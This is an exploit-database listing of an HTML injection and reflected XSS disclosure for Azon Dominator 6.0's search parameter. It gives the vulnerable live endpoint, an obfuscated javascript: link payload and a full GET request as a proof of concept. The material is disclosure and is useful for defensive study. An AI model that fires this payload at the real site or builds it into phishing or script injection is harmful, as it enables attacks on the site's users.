Exploit for Azon Dominator 6.0 HTML Injection

Name: Exploit for Azon Dominator 6.0 HTML Injection
Rating: 5 (28 reviews)
2025-03-17 | CVSS 7.7
## https://sploitus.com/exploit?id=PACKETSTORM:189878
Hi There,
    
    Azon Dominator is vulnerable to an HTML Injection vulnerability in its
    search functionality. The issue arises due to insufficient input validation
    in the q parameter, allowing an attacker to inject arbitrary HTML elements.
    This could lead to potential security risks such as content manipulation or
    phishing attacks.
    
    Source URL: https://azon-dominator.webister.net/
    Source Name: Seyfullah Kılıç
    Software URL: https://azon-dominator.webister.net/
    
    *Proof of Concept (PoC):*
    Vulnerable Endpoint:
    URL: https://azon-dominator.webister.net/searchurl?q=
    Method: GET
    Parameter Affected: q
    Vulnerability Type: Reflected XSS / HTML Injection
    
    *Payload Example:*
    <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
    
    *Request Example:*
    GET
    /search?q=%3Ca%20href=%22javas\x00cript:javascript:alert(1)%22%20id=%22fuzzelement1%22%3Etest%3C/a%3E
    HTTP/2
    Host: azon-dominator.webister.net
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    
    This vulnerability allows an attacker to inject arbitrary HTML content into
    the search query, potentially leading to security risks such as content
    spoofing or malicious script injection.
    
    Regards.
    
    -- 
    
    *Seyfullah KILIÇ*
    
    *CEO - Founder*